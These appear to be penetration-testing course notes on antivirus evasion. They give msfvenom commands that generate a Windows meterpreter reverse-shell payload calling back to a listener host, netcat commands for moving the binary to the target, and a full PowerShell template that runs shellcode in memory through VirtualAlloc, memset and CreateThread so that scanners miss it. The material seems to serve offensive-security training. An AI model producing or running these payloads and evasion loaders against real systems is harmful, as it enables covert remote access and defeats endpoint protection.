Antivirus Evasion
Step 1: Generate portable execution file (PE)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe
Step 2: Run it through a virus scan website such as below
- Be mindful when submitting executables online since as soon as you submit, it becomes public.
Step 3: Transfer the file to Windows for more analysis
#on Windows
nc.exe -nvlp 4455 > C:\Windows\Temp\binary.exe
#from kali
nc -w 3 IP 4455 < binary.exe
- 1.Packers
- 2.Obfuscators
- 3.Crypters
- 4.Software Protectors
- volatile memory
- it's harder for the system to know since it's going to be run inside the interpreter and the script isn't executable code.
- Below is the template. Create a malicious payload with msfvenom and put the payload inside the sc variable.
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc =
Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$sc = <place your shellcode here>;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
using the VirtualAlloc, it inputs each byte of the payload to the newly allocated memory block.
The last line executes the payload with CreateThread.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell
Last modified 1yr ago